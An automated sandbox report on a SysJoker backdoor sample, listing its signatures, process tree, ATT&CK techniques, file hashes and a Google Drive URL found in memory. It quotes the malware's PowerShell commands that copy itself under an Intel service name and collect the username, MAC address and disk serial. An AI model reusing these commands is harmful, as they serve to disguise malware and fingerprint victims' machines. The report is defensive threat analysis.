                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D34DD5 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter

                        HIPS / PFW / Operating System Protection Evasion:

                        Encrypted powershell cmdline option found
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlm
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe" Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumberJump to behavior
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmp | Binary or memory string: Progman
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmp | Binary or memory string: .Program ManagerQEIA
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: GetLocaleInfoW,0_2_00C098B8
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00C0EAAA
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: EnumSystemLocalesW,0_2_00C09396
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00C0E31E
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00C0EC7F
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: EnumSystemLocalesW,0_2_00C0E5C0
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: EnumSystemLocalesW,0_2_00C0E6A6
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: EnumSystemLocalesW,0_2_00C0E60B
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,7_2_00D49396
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW,7_2_00D4E31E
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,7_2_00D4E5C0
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,7_2_00D4E6A6
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,7_2_00D4E60B
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00D4E731
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,7_2_00D498B8
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,7_2_00D4E984
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_00D4EAAA
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,7_2_00D4EBB0
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00D4EC7F
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BF5007 cpuid 0_2_00BF5007
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C098F7 GetSystemTimeAsFileTime,0_2_00C098F7

                        Stealing of Sensitive Information:

                        Yara detected SysJoker
                        Source: Yara match | File source: qtjRj8L3Rw.exe, type: SAMPLE
                        Source: Yara match | File source: 7.0.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: qtjRj8L3Rw.exe PID: 5732, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: igfxCUIService.exe PID: 4384, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\SystemData\igfxCUIService.exe, type: DROPPED

                        Remote Access Functionality:

                        Yara detected SysJoker
                        Source: Yara match | File source: qtjRj8L3Rw.exe, type: SAMPLE
                        Source: Yara match | File source: 7.0.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: qtjRj8L3Rw.exe PID: 5732, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: igfxCUIService.exe PID: 4384, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\SystemData\igfxCUIService.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        (Digits appended to a technique name are the report's hit-count badges for that technique; an empty cell means no technique is listed in that column for the row.)

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Windows Management Instrumentation2 | Application Shimming1 | Process Injection12 | Masquerading1 | Input Capture1 | System Time Discovery1 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Command and Scripting Interpreter1 | Boot or Logon Initialization Scripts | Application Shimming1 | Virtualization/Sandbox Evasion121 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | PowerShell2 | Logon Script (Windows) | Logon Script (Windows) | Process Injection12 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information11 | NTDS | Virtualization/Sandbox Evasion121 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information2 | LSA Secrets | Application Window Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery32 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                        Behavior Graph

                        Behavior Graph ID: 1708662 | Sample: qtjRj8L3Rw | Start date: 12/01/2022 | Architecture: WINDOWS | Score: 88

                        Graph-level signatures: Antivirus / Scanner detection for submitted sample; Yara detected SysJoker; Found detection on Joe Sandbox Cloud Basic

                        Process tree recovered from the graph nodes (signatures attached to a node in brackets):

                        qtjRj8L3Rw.exe
                            igfxCUIService.exe [Antivirus detection for dropped file; Encrypted powershell cmdline option found]
                                powershell.exe
                                    getmac.exe [Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI]
                                    WMIC.exe
                                    conhost.exe
                                powershell.exe
                                    conhost.exe
                            powershell.exe [Powershell drops PE file] dropped: C:\ProgramData\...\igfxCUIService.exe (PE32), C:\...\igfxCUIService.exe:Zone.Identifier (ASCII)
                                conhost.exe


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label | Link
                        qtjRj8L3Rw.exe | 100% | Avira | TR/Redcap.rjsiq |

                        Dropped Files

                        Source | Detection | Scanner | Label | Link
                        C:\ProgramData\SystemData\igfxCUIService.exe | 100% | Avira | TR/Redcap.rjsiq |

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu2 | igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmp | false | | high
                        https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu | igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmp | false | | high

                            Contacted IPs

                            No contacted IP infos

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:1708662
                            Start date:12.01.2022
                            Start time:14:10:56
                            Joe Sandbox Product:Cloud
                            Overall analysis duration:0h 9m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:qtjRj8L3Rw (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10x64 version 1803 (IE 11.1, Chrome 67, Firefox 61, Adobe Reader DC 18, Java 8 Update 171)
Number of new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal88.troj.evad.winEXE@16/11@0/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 0.1% (good quality ratio 0.1%)
                            • Quality average: 53%
                            • Quality standard deviation: 0%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            Warnings:
                            • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
                            • Excluded domains from analysis (whitelisted): go.microsoft.com, fs.microsoft.com, login.live.com, clientconfig.passport.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Signature Similarity


                            Simulations

                            Behavior and APIs

Time | Type | Description
14:13:07 | API Interceptor | 7x Sleep call for process: qtjRj8L3Rw.exe modified
14:13:52 | API Interceptor | 49x Sleep call for process: powershell.exe modified
14:13:54 | API Interceptor | 9x Sleep call for process: igfxCUIService.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

Match | Associated Sample Name / URL | Detection
C:\ProgramData\SystemData\igfxCUIService.exe | #SysJoker_n2.exe | malicious
C:\ProgramData\SystemData\igfxCUIService.exe | IGFXCUISERVICE.EXE | malicious

                                Created / dropped Files

                                C:\ProgramData\SystemData\igfxCUIService.exe
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):401920
                                Entropy (8bit):6.560987668019584
                                Encrypted:false
                                SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                MD5:D90D0F4D6DAD402B5D025987030CC87C
                                SHA1:FAD66BDF5C5DC2C050CBC574832C6995DBA086A0
                                SHA-256:1FFD6559D21470C40DCF9236DA51E5823D7AD58C93502279871C3FE7718C901C
                                SHA-512:C2FAEACFD588585633630AD710F443A72C7617C2D5E37DBFE43570E6AC5904E4B81EB682356A48A93BB794EF5E9D8AD0D673966D57798079B4DE62EA61241024
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: C:\ProgramData\SystemData\igfxCUIService.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
Joe Sandbox View:
• Filename: #SysJoker_n2.exe, Detection: malicious
• Filename: IGFXCUISERVICE.EXE, Detection: malicious
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@......................@...N.......N.....N.........................g.....g.R...g.....Rich............................PE..L...b*1a.............................M............@..........................`............@.....................................x............................ ...8.....................................@............................................text.............................. ..`.rdata...?.......@..................@..@.data....!..........................@....rsrc...............................@..@.reloc...8... ...:..................@..B................................................................................................................................................................................................................................................................................................
                                C:\ProgramData\SystemData\igfxCUIService.exe:Zone.Identifier
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: [ZoneTransfer]....ZoneId=0
                                C:\ProgramData\SystemData\temps1.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):242
                                Entropy (8bit):3.744262078789027
                                Encrypted:false
                                SSDEEP:3:mSGg0W/FLyzdAFFFFm8xY/5hAVML6tdRRdnp+thONq:Cg0G5ym/m8GAD6Gs
                                MD5:1F9136F65D689B583097B6F38788B536
                                SHA1:B35D5EA6C7CBC73037F90E3009F00F72883E1B96
                                SHA-256:41970814664E728B105B6AE07244D39DFE036D8F56D55BD7D6AB99EBAF6C276F
                                SHA-512:D1352021E2797C860FCAD87271F9FF5C9E706C077810B94FC323FF691ECE4AA50DC2CAFD7EAB94D242F01E18281E6E249C4C991B0B78E811BED2A832CE760679
                                Malicious:false
                                Preview: ..Physical Address Transport Name ..=================== ==========================================================..5C-22-C6-13-4E-F9 \Device\Tcpip_{B8652DFC-E1F5-449D-BAE4-BFF4128DE918} ..
                                C:\ProgramData\SystemData\temps2.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):79
                                Entropy (8bit):3.433465716504146
                                Encrypted:false
                                SSDEEP:3:qXVFZycUbEcF75r:7cUg07F
                                MD5:836F27CBBDF1E1D7A6CFAD4B3B017854
                                SHA1:1D8FA7E3DF507FF69E27BCC7A1E9AF9B5EEC0917
                                SHA-256:3914DD947B9DDD2B833C6984A27BECAF10C4E0A025CB5D95A7F972285E920BC7
                                SHA-512:29B7481318CD869C00F6A9C16011436971B8B0B2BCF557A48FFB5F762386E470CE1547EF5C23C6C89477C36BAAB1ED307ABB6BE98ED4521B3F94F506E29DFC26
                                Malicious:false
                                Preview: SerialNumber ....VBc9b17e68-05a2fbcb .... ........
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20928
                                Entropy (8bit):5.736673923217396
                                Encrypted:false
                                SSDEEP:384:OEDMvl7kLYyB3r/KKnYCP9qm8u0NRsevi6qoRs7CBr4xRRy3r:DLbG109qlsI2F4r
                                MD5:62FBD2028BA46AB5C9929FEBE0DDDF1E
                                SHA1:6D8A34C9F7D20F88A141F607F9520A2C9B9118C3
                                SHA-256:C772F93662B1EDD867A4C12DE354E195B8FDBB3E07EDF809F5DFD1022D4E544F
                                SHA-512:F8816986B1DAE6B0C49E2F8EF74B8ECDC6427E8DB15BBB9E921442BE8965DD0B85D3A702730DDAD0EA1D35C4754E3C6972A81E0D45D9308D49F7DD172C5DCF14
                                Malicious:false
                                Preview: @...e...........X.......a...............|.?..........@..........0...............G-.o...A...4B..&.......System..H.................]....E..Jqp...)..... .Microsoft.PowerShell.ConsoleHostD................N..o.H...1.w.........System.Management.Automation4.................A:.(.D...............System.Core.4................Zg5..:O..g..q..u.......System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4.................5...KG..)....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cmkzftm.ckp.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.481774803623838
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHiQEon:SnqbKAKWGKMoo
                                MD5:527CB6C3BC5154A156D0EA016483A34C
                                SHA1:04D2802479D325F6E5D615A612769C916BE2DF23
                                SHA-256:8E7B2AA8B3DC0007DA4C75608D4199A6780C09982862661114F172E68DCE21B4
                                SHA-512:B3A4F81BD514C68E607BF1B65CFF3DC58A05C68ADFF8F5F6878B6012579E7EA1D122E1E0C6C1DB420B6BB7A749D9DCA27159E24E798549AFC6744A7159557AF9
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:14:51 PM
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmv4hq3u.jjj.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.522338709846795
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHRTFi:SnqbKAKWGKMxTFi
                                MD5:C5634FF893F8A8DED82722075C1C3C2C
                                SHA1:3DF424425568D6CC0F3A88BBAB90CA721FC20C44
                                SHA-256:3D94B8F90F9750B62BB00F6648B1AD327C8CA96101C270EAE53AFB10EF4F14E5
                                SHA-512:980A3C99D53268A247A7E2D42B7BCDE8D83AA03253696E10BCCB21AB7BEA2E28184744A3174893B35BDFB6274BF5D96A973D5FBB6E8C9BB5B96F551B3B02B6C4
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:13:46 PM
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltcvmphj.tyt.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):80
                                Entropy (8bit):4.481774803623838
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFKOMHiQEon:SnqbKAKWGKMoo
                                MD5:527CB6C3BC5154A156D0EA016483A34C
                                SHA1:04D2802479D325F6E5D615A612769C916BE2DF23
                                SHA-256:8E7B2AA8B3DC0007DA4C75608D4199A6780C09982862661114F172E68DCE21B4
                                SHA-512:B3A4F81BD514C68E607BF1B65CFF3DC58A05C68ADFF8F5F6878B6012579E7EA1D122E1E0C6C1DB420B6BB7A749D9DCA27159E24E798549AFC6744A7159557AF9
                                Malicious:false
                                Preview: # PowerShell test file to determine AppLocker lockdown mode 1/12/2022 2:14:51 PM
